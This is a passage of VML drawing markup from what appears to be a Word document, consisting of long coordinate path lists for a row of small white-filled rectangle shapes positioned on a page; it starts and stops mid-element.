59,6657,5964,6657,5968,6657,5973,6657,5977,6657,5982,6657,5987,6657,5991,6657,5996,6657,6001,6657,6007,6657,6012,6657,6017,6657,6023,6657,6028,6657,6034,6657,6039,6657,6045,6657,6051,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6657,6057,6658,6057,6658,6057,6658,6057,6658,6057,6658,6057,6658,6057,6658,6057,6658,6057,6658,6057,6658,6057,6659,6057,6659,6057,6659,6057,6659,6057,6659,6057,6660,6057,6660,6057,6660,6057,6661,6057,6661,6057,6661,6057,6662,6057,6662,6057,6663,6057,6663,6057,6664,6057,6664,6057,6665,6057,6666,6057,6666,6057,6667,6057,6668,6057,6669,6057,6669,6057,6670,6057,6671,6057,6672,6057,6673,6057,6674,6057,6675,6057,6676,6057,6677,6057,6679,6057,6680,6057,6681,6057,6683,6057,6684,6057,6685,6057,6687,6057,6688,6057,6690,6057,6692,6057,6693,6057,6695,6057,6697,6057,6699,6057,6701,6057,6703,6057,6705,6057,6707,6057,6709,6057,6712,6057,6714,6057,6716,6057,6719,6057,6721,6057,6724,6057,6726,6057,6729,6057,6732,6057,6735,6057,6738,6057,6741,6057,6744,6057,6747,6057,6750,6057,6754,6057,6757,6057,6761,6057,6764,6057,6768,6057,6771,6057,6775,6057,6779,6057,6783,6057,6787,6057,6791,6057,6796,6057,6800,6057,6804,6057,6809,6057,6813,6057,6818,6057,6823,6057,6828,6057,6833,6057,6838,6057,6843,6057,6848,6057,6853,6057,6859,6057,6864,6057,6870,6057,6876,6057,6882,6057,6888,6057,6894,6057,6900,6057,6906,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6057,6912,6056,6912,6056,6912,6056,6912,6056,6912,6056,6912,6056,6912,6056,6912,6055,6912,6055,6912,6055,6912,6055,6912,6054,6912,6054,6912,6054,6912,6053,6912,6053,6912,6052,6912,6052,6912,6051,6912,6051,6912,6050,6912,6050,6912,6049,6912,6049,6912,6048,6912,6047,6912,6046,6912,6046,6912,6045,6912,6044,6912,6043,6912,6042,6912,6041,6912,6040,6912,6039,6912,6038,6912,6037,6912,6036,6912,6035,6912,6033,6912,6032,6912,6031,6912,6029,6912,6028,6912,6026,6912,6025,6912,6023,6912,6021,6912,6020,6912,6018,6912,6016,6912,6014,6912,6012,6912,6010,6912,6008,6912,6006,6912,6004,6912,6002,6912,5999,6912,5997,6912,5995,6912,5992,6912,5989,6912,5987,6912,5984,6912,5981,6912,5978,6912,5976,6912,5973,6912,5970,6912,5966,6912,5963,6912,5960,6912,5957,6912,5953,6912,5950,6912,5946,6912,5942,6912,5939,6912,5935,6912,5931,6912,5927,6912,5923,6912,5919,6912,5915,6912,5910,6912,5906,6912,5901,6912,5897,6912,5892,6912,5887,6912,5882,6912,5878,6912,5873,6912,5867,6912,5862,6912,5857,6912,5851,6912,5846,6912,5840,6912,5835,6912,5829,6912,5823,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6911,5817,6911,5817,6911,5817,6911,5817,6911,5817,6910,5817,6910,5817,6910,5817,6910,5817,6909,5817,6909,5817,6908,5817,6908,5817,6908,5817,6907,5817,6907,5817,6906,5817,6905,5817,6905,5817,6904,5817,6904,5817,6903,5817,6902,5817,6901,5817,6900,5817,6900,5817,6899,5817,6898,5817,6897,5817,6896,5817,6895,5817,6894,5817,6892,5817,6891,5817,6890,5817,6889,5817,6887,5817,6886,5817,6884,5817,6883,5817,6881,5817,6880,5817,6878,5817,6876,5817,6875,5817,6873,5817,6871,5817,6869,5817,6867,5817,6865,5817,6863,5817,6861,5817,6858,5817,6856,5817,6854,5817,6851,5817,6849,5817,6846,5817,6843,5817,6841,5817,6838,5817,6835,5817,6832,5817,6829,5817,6826,5817,6823,5817,6820,5817,6816,5817,6813,5817,6809,5817,6806,5817,6802,5817,6798,5817,6795,5817,6791,5817,6787,5817,6783,5817,6779,5817,6774,5817,6770,5817,6766,5817,6761,5817,6756,5817,6752,5817,6747,5817,6742,5817,6737,5817,6732,5817,6727,5817,6722,5817,6716,5817,6711,5817,6705,5817,6700,5817,6694,5817,6688,5817,6682,5817,6676,5817,6670,5817,6664,5817,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:307.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6150,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:6150;top:6630;width:250;height:270" coordorigin="6150,6630" coordsize="250,270" path="m6177,6657l6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6177,6657,6178,6657,6178,6657,6178,6657,6178,6657,6178,6657,6178,6657,6178,6657,6178,6657,6179,6657,6179,6657,6179,6657,6179,6657,6180,6657,6180,6657,6180,6657,6181,6657,6181,6657,6181,6657,6182,6657,6182,6657,6183,6657,6183,6657,6184,6657,6184,6657,6185,6657,6186,6657,6186,6657,6187,6657,6188,6657,6188,6657,6189,6657,6190,6657,6191,6657,6192,6657,6193,6657,6194,6657,6195,6657,6196,6657,6197,6657,6198,6657,6200,6657,6201,6657,6202,6657,6203,6657,6205,6657,6206,6657,6208,6657,6209,6657,6211,6657,6213,6657,6214,6657,6216,6657,6218,6657,6220,6657,6222,6657,6224,6657,6226,6657,6228,6657,6230,6657,6233,6657,6235,6657,6237,6657,6240,6657,6242,6657,6245,6657,6247,6657,6250,6657,6253,6657,6256,6657,6259,6657,6262,6657,6265,6657,6268,6657,6271,6657,6274,6657,6278,6657,6281,6657,6284,6657,6288,6657,6292,6657,6295,6657,6299,6657,6303,6657,6307,6657,6311,6657,6315,6657,6320,6657,6324,6657,6328,6657,6333,6657,6337,6657,6342,6657,6347,6657,6352,6657,6357,6657,6362,6657,6367,6657,6372,6657,6377,6657,6383,6657,6388,6657,6394,6657,6400,6657,6405,6657,6411,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6658,6417,6658,6417,6658,6417,6658,6417,6658,6417,6658,6417,6658,6417,6658,6417,6658,6417,6658,6417,6659,6417,6659,6417,6659,6417,6659,6417,6659,6417,6660,6417,6660,6417,6660,6417,6661,6417,6661,6417,6661,6417,6662,6417,6662,6417,6663,6417,6663,6417,6664,6417,6664,6417,6665,6417,6666,6417,6666,6417,6667,6417,6668,6417,6669,6417,6669,6417,6670,6417,6671,6417,6672,6417,6673,6417,6674,6417,6675,6417,6676,6417,6677,6417,6679,6417,6680,6417,6681,6417,6683,6417,6684,6417,6685,6417,6687,6417,6688,6417,6690,6417,6692,6417,6693,6417,6695,6417,6697,6417,6699,6417,6701,6417,6703,6417,6705,6417,6707,6417,6709,6417,6712,6417,6714,6417,6716,6417,6719,6417,6721,6417,6724,6417,6726,6417,6729,6417,6732,6417,6735,6417,6738,6417,6741,6417,6744,6417,6747,6417,6750,6417,6754,6417,6757,6417,6761,6417,6764,6417,6768,6417,6771,6417,6775,6417,6779,6417,6783,6417,6787,6417,6791,6417,6796,6417,6800,6417,6804,6417,6809,6417,6813,6417,6818,6417,6823,6417,6828,6417,6833,6417,6838,6417,6843,6417,6848,6417,6853,6417,6859,6417,6864,6417,6870,6417,6876,6417,6882,6417,6888,6417,6894,6417,6900,6417,6906,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6416,6912,6416,6912,6416,6912,6416,6912,6416,6912,6415,6912,6415,6912,6415,6912,6415,6912,6414,6912,6414,6912,6414,6912,6413,6912,6413,6912,6413,6912,6412,6912,6412,6912,6411,6912,6411,6912,6410,6912,6409,6912,6409,6912,6408,6912,6407,6912,6407,6912,6406,6912,6405,6912,6404,6912,6403,6912,6402,6912,6401,6912,6400,6912,6399,6912,6398,6912,6397,6912,6396,6912,6395,6912,6394,6912,6392,6912,6391,6912,6389,6912,6388,6912,6386,6912,6385,6912,6383,6912,6382,6912,6380,6912,6378,6912,6376,6912,6374,6912,6372,6912,6370,6912,6368,6912,6366,6912,6364,6912,6362,6912,6359,6912,6357,6912,6355,6912,6352,6912,6350,6912,6347,6912,6344,6912,6342,6912,6339,6912,6336,6912,6333,6912,6330,6912,6327,6912,6323,6912,6320,6912,6317,6912,6313,6912,6310,6912,6306,6912,6303,6912,6299,6912,6295,6912,6291,6912,6287,6912,6283,6912,6279,6912,6275,6912,6270,6912,6266,6912,6262,6912,6257,6912,6252,6912,6248,6912,6243,6912,6238,6912,6233,6912,6228,6912,6222,6912,6217,6912,6212,6912,6206,6912,6201,6912,6195,6912,6189,6912,6183,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6912,6177,6911,6177,6911,6177,6911,6177,6911,6177,6911,6177,6910,6177,6910,6177,6910,6177,6910,6177,6909,6177,6909,6177,6908,6177,6908,6177,6908,6177,6907,6177,6907,6177,6906,6177,6905,6177,6905,6177,6904,6177,6904,6177,6903,6177,6902,6177,6901,6177,6900,6177,6900,6177,6899,6177,6898,6177,6897,6177,6896,6177,6895,6177,6894,6177,6892,6177,6891,6177,6890,6177,6889,6177,6887,6177,6886,6177,6884,6177,6883,6177,6881,6177,6880,6177,6878,6177,6876,6177,6875,6177,6873,6177,6871,6177,6869,6177,6867,6177,6865,6177,6863,6177,6861,6177,6858,6177,6856,6177,6854,6177,6851,6177,6849,6177,6846,6177,6843,6177,6841,6177,6838,6177,6835,6177,6832,6177,6829,6177,6826,6177,6823,6177,6820,6177,6816,6177,6813,6177,6809,6177,6806,6177,6802,6177,6798,6177,6795,6177,6791,6177,6787,6177,6783,6177,6779,6177,6774,6177,6770,6177,6766,6177,6761,6177,6756,6177,6752,6177,6747,6177,6742,6177,6737,6177,6732,6177,6727,6177,6722,6177,6716,6177,6711,6177,6705,6177,6700,6177,6694,6177,6688,6177,6682,6177,6676,6177,6670,6177,6664,6177,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:6390;top:6630;width:250;height:270" coordorigin="6390,6630" coordsize="250,270" path="m6417,6657l6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6417,6657,6418,6657,6418,6657,6418,6657,6418,6657,6418,6657,6418,6657,6418,6657,6418,6657,6419,6657,6419,6657,6419,6657,6419,6657,6419,6657,6420,6657,6420,6657,6420,6657,6421,6657,6421,6657,6421,6657,6422,6657,6422,6657,6423,6657,6423,6657,6424,6657,6424,6657,6425,6657,6426,6657,6426,6657,6427,6657,6428,6657,6429,6657,6429,6657,6430,6657,6431,6657,6432,6657,6433,6657,6434,6657,6435,6657,6436,6657,6437,6657,6438,6657,6440,6657,6441,6657,6442,6657,6444,6657,6445,6657,6446,6657,6448,6657,6450,6657,6451,6657,6453,6657,6455,6657,6456,6657,6458,6657,6460,6657,6462,6657,6464,6657,6466,6657,6468,6657,6470,6657,6473,6657,6475,6657,6477,6657,6480,6657,6482,6657,6485,6657,6487,6657,6490,6657,6493,6657,6496,6657,6499,6657,6502,6657,6505,6657,6508,6657,6511,6657,6514,6657,6518,6657,6521,6657,6525,6657,6528,6657,6532,6657,6536,6657,6539,6657,6543,6657,6547,6657,6551,6657,6555,6657,6560,6657,6564,6657,6568,6657,6573,6657,6578,6657,6582,6657,6587,6657,6592,6657,6597,6657,6602,6657,6607,6657,6612,6657,6617,6657,6623,6657,6628,6657,6634,6657,6640,6657,6645,6657,6651,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6659,6657,6659,6657,6659,6657,6659,6657,6659,6657,6660,6657,6660,6657,6660,6657,6661,6657,6661,6657,6661,6657,6662,6657,6662,6657,6663,6657,6663,6657,6664,6657,6664,6657,6665,6657,6666,6657,6666,6657,6667,6657,6668,6657,6669,6657,6669,6657,6670,6657,6671,6657,6672,6657,6673,6657,6674,6657,6675,6657,6676,6657,6677,6657,6679,6657,6680,6657,6681,6657,6683,6657,6684,6657,6685,6657,6687,6657,6688,6657,6690,6657,6692,6657,6693,6657,6695,6657,6697,6657,6699,6657,6701,6657,6703,6657,6705,6657,6707,6657,6709,6657,6712,6657,6714,6657,6716,6657,6719,6657,6721,6657,6724,6657,6726,6657,6729,6657,6732,6657,6735,6657,6738,6657,6741,6657,6744,6657,6747,6657,6750,6657,6754,6657,6757,6657,6761,6657,6764,6657,6768,6657,6771,6657,6775,6657,6779,6657,6783,6657,6787,6657,6791,6657,6796,6657,6800,6657,6804,6657,6809,6657,6813,6657,6818,6657,6823,6657,6828,6657,6833,6657,6838,6657,6843,6657,6848,6657,6853,6657,6859,6657,6864,6657,6870,6657,6876,6657,6882,6657,6888,6657,6894,6657,6900,6657,6906,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6656,6912,6656,6912,6656,6912,6656,6912,6656,6912,6655,6912,6655,6912,6655,6912,6655,6912,6654,6912,6654,6912,6654,6912,6653,6912,6653,6912,6652,6912,6652,6912,6651,6912,6651,6912,6650,6912,6650,6912,6649,6912,6648,6912,6648,6912,6647,6912,6646,6912,6645,6912,6644,6912,6643,6912,6643,6912,6642,6912,6641,6912,6640,6912,6638,6912,6637,6912,6636,6912,6635,6912,6634,6912,6632,6912,6631,6912,6630,6912,6628,6912,6627,6912,6625,6912,6623,6912,6622,6912,6620,6912,6618,6912,6616,6912,6614,6912,6613,6912,6611,6912,6608,6912,6606,6912,6604,6912,6602,6912,6600,6912,6597,6912,6595,6912,6592,6912,6590,6912,6587,6912,6584,6912,6582,6912,6579,6912,6576,6912,6573,6912,6570,6912,6567,6912,6564,6912,6560,6912,6557,6912,6553,6912,6550,6912,6546,6912,6543,6912,6539,6912,6535,6912,6531,6912,6527,6912,6523,6912,6519,6912,6515,6912,6511,6912,6506,6912,6502,6912,6497,6912,6492,6912,6488,6912,6483,6912,6478,6912,6473,6912,6468,6912,6462,6912,6457,6912,6452,6912,6446,6912,6441,6912,6435,6912,6429,6912,6423,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6912,6417,6911,6417,6911,6417,6911,6417,6911,6417,6911,6417,6910,6417,6910,6417,6910,6417,6910,6417,6909,6417,6909,6417,6908,6417,6908,6417,6908,6417,6907,6417,6907,6417,6906,6417,6905,6417,6905,6417,6904,6417,6904,6417,6903,6417,6902,6417,6901,6417,6900,6417,6900,6417,6899,6417,6898,6417,6897,6417,6896,6417,6895,6417,6894,6417,6892,6417,6891,6417,6890,6417,6889,6417,6887,6417,6886,6417,6884,6417,6883,6417,6881,6417,6880,6417,6878,6417,6876,6417,6875,6417,6873,6417,6871,6417,6869,6417,6867,6417,6865,6417,6863,6417,6861,6417,6858,6417,6856,6417,6854,6417,6851,6417,6849,6417,6846,6417,6843,6417,6841,6417,6838,6417,6835,6417,6832,6417,6829,6417,6826,6417,6823,6417,6820,6417,6816,6417,6813,6417,6809,6417,6806,6417,6802,6417,6798,6417,6795,6417,6791,6417,6787,6417,6783,6417,6779,6417,6774,6417,6770,6417,6766,6417,6761,6417,6756,6417,6752,6417,6747,6417,6742,6417,6737,6417,6732,6417,6727,6417,6722,6417,6716,6417,6711,6417,6705,6417,6700,6417,6694,6417,6688,6417,6682,6417,6676,6417,6670,6417,6664,6417,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:331.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6630,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:6630;top:6630;width:250;height:270" coordorigin="6630,6630" coordsize="250,270" path="m6657,6657l6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6658,6657,6659,6657,6659,6657,6659,6657,6659,6657,6660,6657,6660,6657,6660,6657,6660,6657,6661,6657,6661,6657,6662,6657,6662,6657,6662,6657,6663,6657,6663,6657,6664,6657,6665,6657,6665,6657,6666,6657,6666,6657,6667,6657,6668,6657,6669,6657,6669,6657,6670,6657,6671,6657,6672,6657,6673,6657,6674,6657,6675,6657,6676,6657,6677,6657,6679,6657,6680,6657,6681,6657,6682,6657,6684,6657,6685,6657,6687,6657,6688,6657,6690,6657,6691,6657,6693,6657,6695,6657,6696,6657,6698,6657,6700,6657,6702,6657,6704,6657,6706,6657,6708,6657,6711,6657,6713,6657,6715,6657,6717,6657,6720,6657,6722,6657,6725,6657,6728,6657,6730,6657,6733,6657,6736,6657,6739,6657,6742,6657,6745,6657,6748,6657,6751,6657,6754,6657,6758,6657,6761,6657,6765,6657,6768,6657,6772,6657,6776,6657,6780,6657,6783,6657,6787,6657,6791,6657,6796,6657,6800,6657,6804,6657,6809,6657,6813,6657,6818,6657,6822,6657,6827,6657,6832,6657,6837,6657,6842,6657,6847,6657,6852,6657,6858,6657,6863,6657,6868,6657,6874,6657,6880,6657,6886,6657,6891,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6658,6897,6658,6897,6658,6897,6658,6897,6658,6897,6658,6897,6658,6897,6658,6897,6658,6897,6658,6897,6659,6897,6659,6897,6659,6897,6659,6897,6659,6897,6660,6897,6660,6897,6660,6897,6661,6897,6661,6897,6661,6897,6662,6897,6662,6897,6663,6897,6663,6897,6664,6897,6664,6897,6665,6897,6666,6897,6666,6897,6667,6897,6668,6897,6669,6897,6669,6897,6670,6897,6671,6897,6672,6897,6673,6897,6674,6897,6675,6897,6676,6897,6677,6897,6679,6897,6680,6897,6681,6897,6683,6897,6684,6897,6685,6897,6687,6897,6688,6897,6690,6897,6692,6897,6693,6897,6695,6897,6697,6897,6699,6897,6701,6897,6703,6897,6705,6897,6707,6897,6709,6897,6712,6897,6714,6897,6716,6897,6719,6897,6721,6897,6724,6897,6726,6897,6729,6897,6732,6897,6735,6897,6738,6897,6741,6897,6744,6897,6747,6897,6750,6897,6754,6897,6757,6897,6761,6897,6764,6897,6768,6897,6771,6897,6775,6897,6779,6897,6783,6897,6787,6897,6791,6897,6796,6897,6800,6897,6804,6897,6809,6897,6813,6897,6818,6897,6823,6897,6828,6897,6833,6897,6838,6897,6843,6897,6848,6897,6853,6897,6859,6897,6864,6897,6870,6897,6876,6897,6882,6897,6888,6897,6894,6897,6900,6897,6906,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6896,6912,6896,6912,6896,6912,6896,6912,6896,6912,6896,6912,6895,6912,6895,6912,6895,6912,6894,6912,6894,6912,6894,6912,6893,6912,6893,6912,6892,6912,6892,6912,6891,6912,6891,6912,6890,6912,6890,6912,6889,6912,6888,6912,6888,6912,6887,6912,6886,6912,6885,6912,6884,6912,6884,6912,6883,6912,6882,6912,6881,6912,6880,6912,6879,6912,6877,6912,6876,6912,6875,6912,6874,6912,6872,6912,6871,6912,6870,6912,6868,6912,6867,6912,6865,6912,6864,6912,6862,6912,6860,6912,6858,6912,6857,6912,6855,6912,6853,6912,6851,6912,6849,6912,6846,6912,6844,6912,6842,6912,6840,6912,6837,6912,6835,6912,6832,6912,6830,6912,6827,6912,6825,6912,6822,6912,6819,6912,6816,6912,6813,6912,6810,6912,6807,6912,6804,6912,6800,6912,6797,6912,6794,6912,6790,6912,6787,6912,6783,6912,6779,6912,6775,6912,6771,6912,6767,6912,6763,6912,6759,6912,6755,6912,6751,6912,6746,6912,6742,6912,6737,6912,6733,6912,6728,6912,6723,6912,6718,6912,6713,6912,6708,6912,6703,6912,6697,6912,6692,6912,6686,6912,6681,6912,6675,6912,6669,6912,6663,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6912,6657,6911,6657,6911,6657,6911,6657,6911,6657,6911,6657,6910,6657,6910,6657,6910,6657,6910,6657,6909,6657,6909,6657,6908,6657,6908,6657,6908,6657,6907,6657,6907,6657,6906,6657,6905,6657,6905,6657,6904,6657,6904,6657,6903,6657,6902,6657,6901,6657,6900,6657,6900,6657,6899,6657,6898,6657,6897,6657,6896,6657,6895,6657,6894,6657,6892,6657,6891,6657,6890,6657,6889,6657,6887,6657,6886,6657,6884,6657,6883,6657,6881,6657,6880,6657,6878,6657,6876,6657,6875,6657,6873,6657,6871,6657,6869,6657,6867,6657,6865,6657,6863,6657,6861,6657,6858,6657,6856,6657,6854,6657,6851,6657,6849,6657,6846,6657,6843,6657,6841,6657,6838,6657,6835,6657,6832,6657,6829,6657,6826,6657,6823,6657,6820,6657,6816,6657,6813,6657,6809,6657,6806,6657,6802,6657,6798,6657,6795,6657,6791,6657,6787,6657,6783,6657,6779,6657,6774,6657,6770,6657,6766,6657,6761,6657,6756,6657,6752,6657,6747,6657,6742,6657,6737,6657,6732,6657,6727,6657,6722,6657,6716,6657,6711,6657,6705,6657,6700,6657,6694,6657,6688,6657,6682,6657,6676,6657,6670,6657,6664,6657,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:343.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6870,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:6870;top:6630;width:250;height:270" coordorigin="6870,6630" coordsize="250,270" path="m6897,6657l6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6897,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6898,6657,6899,6657,6899,6657,6899,6657,6899,6657,6899,6657,6900,6657,6900,6657,6900,6657,6901,6657,6901,6657,6901,6657,6902,6657,6902,6657,6903,6657,6903,6657,6904,6657,6904,6657,6905,6657,6905,6657,6906,6657,6907,6657,6907,6657,6908,6657,6909,6657,6910,6657,6910,6657,6911,6657,6912,6657,6913,6657,6914,6657,6915,6657,6916,6657,6918,6657,6919,6657,6920,6657,6921,6657,6922,6657,6924,6657,6925,6657,6927,6657,6928,6657,6930,6657,6931,6657,6933,6657,6935,6657,6937,6657,6938,6657,6940,6657,6942,6657,6944,6657,6946,6657,6948,6657,6951,6657,6953,6657,6955,6657,6958,6657,6960,6657,6963,6657,6965,6657,6968,6657,6970,6657,6973,6657,6976,6657,6979,6657,6982,6657,6985,6657,6988,6657,6991,6657,6995,6657,6998,6657,7001,6657,7005,6657,7008,6657,7012,6657,7016,6657,7020,6657,7024,6657,7028,6657,7032,6657,7036,6657,7040,6657,7044,6657,7049,6657,7053,6657,7058,6657,7062,6657,7067,6657,7072,6657,7077,6657,7082,6657,7087,6657,7092,6657,7098,6657,7103,6657,7109,6657,7114,6657,7120,6657,7126,6657,7132,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6657,7138,6658,7138,6658,7138,6658,7138,6658,7138,6658,7138,6658,7138,6658,7138,6658,7138,6658,7138,6658,7138,6659,7138,6659,7138,6659,7138,6659,7138,6659,7138,6660,7138,6660,7138,6660,7138,6661,7138,6661,7138,6661,7138,6662,7138,6662,7138,6663,7138,6663,7138,6664,7138,6664,7138,6665,7138,6666,7138,6666,7138,6667,7138,6668,7138,6669,7138,6669,7138,6670,7138,6671,7138,6672,7138,6673,7138,6674,7138,6675,7138,6676,7138,6677,7138,6679,7138,6680,7138,6681,7138,6683,7138,6684,7138,6685,7138,6687,7138,6688,7138,6690,7138,6692,7138,6693,7138,6695,7138,6697,7138,6699,7138,6701,7138,6703,7138,6705,7138,6707,7138,6709,7138,6712,7138,6714,7138,6716,7138,6719,7138,6721,7138,6724,7138,6726,7138,6729,7138,6732,7138,6735,7138,6738,7138,6741,7138,6744,7138,6747,7138,6750,7138,6754,7138,6757,7138,6761,7138,6764,7138,6768,7138,6771,7138,6775,7138,6779,7138,6783,7138,6787,7138,6791,7138,6796,7138,6800,7138,6804,7138,6809,7138,6813,7138,6818,7138,6823,7138,6828,7138,6833,7138,6838,7138,6843,7138,6848,7138,6853,7138,6859,7138,6864,7138,6870,7138,6876,7138,6882,7138,6888,7138,6894,7138,6900,7138,6906,7138,6912,7138,6912,7138,6912,7138,6912,7138,6912,7138,6912,7138,6912,7138,6912,7138,6912,7138,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7137,6912,7136,6912,7136,6912,7136,6912,7136,6912,7136,6912,7135,6912,7135,6912,7135,6912,7134,6912,7134,6912,7134,6912,7133,6912,7133,6912,7132,6912,7132,6912,7131,6912,7131,6912,7130,6912,7130,6912,7129,6912,7128,6912,7128,6912,7127,6912,7126,6912,7125,6912,7125,6912,7124,6912,7123,6912,7122,6912,7121,6912,7120,6912,7119,6912,7118,6912,7116,6912,7115,6912,7114,6912,7113,6912,7111,6912,7110,6912,7108,6912,7107,6912,7105,6912,7104,6912,7102,6912,7100,6912,7098,6912,7097,6912,7095,6912,7093,6912,7091,6912,7089,6912,7087,6912,7084,6912,7082,6912,7080,6912,7077,6912,7075,6912,7073,6912,7070,6912,7067,6912,7065,6912,7062,6912,7059,6912,7056,6912,7053,6912,7050,6912,7047,6912,7044,6912,7040,6912,7037,6912,7034,6912,7030,6912,7027,6912,7023,6912,7019,6912,7015,6912,7012,6912,7008,6912,7003,6912,6999,6912,6995,6912,6991,6912,6986,6912,6982,6912,6977,6912,6973,6912,6968,6912,6963,6912,6958,6912,6953,6912,6948,6912,6943,6912,6937,6912,6932,6912,6926,6912,6921,6912,6915,6912,6909,6912,6903,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6912,6897,6911,6897,6911,6897,6911,6897,6911,6897,6911,6897,6910,6897,6910,6897,6910,6897,6910,6897,6909,6897,6909,6897,6908,6897,6908,6897,6908,6897,6907,6897,6907,6897,6906,6897,6905,6897,6905,6897,6904,6897,6904,6897,6903,6897,6902,6897,6901,6897,6900,6897,6900,6897,6899,6897,6898,6897,6897,6897,6896,6897,6895,6897,6894,6897,6892,6897,6891,6897,6890,6897,6889,6897,6887,6897,6886,6897,6884,6897,6883,6897,6881,6897,6880,6897,6878,6897,6876,6897,6875,6897,6873,6897,6871,6897,6869,6897,6867,6897,6865,6897,6863,6897,6861,6897,6858,6897,6856,6897,6854,6897,6851,6897,6849,6897,6846,6897,6843,6897,6841,6897,6838,6897,6835,6897,6832,6897,6829,6897,6826,6897,6823,6897,6820,6897,6816,6897,6813,6897,6809,6897,6806,6897,6802,6897,6798,6897,6795,6897,6791,6897,6787,6897,6783,6897,6779,6897,6774,6897,6770,6897,6766,6897,6761,6897,6756,6897,6752,6897,6747,6897,6742,6897,6737,6897,6732,6897,6727,6897,6722,6897,6716,6897,6711,6897,6705,6897,6700,6897,6694,6897,6688,6897,6682,6897,6676,6897,6670,6897,6664,6897,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,6630" coordsize="250,270">
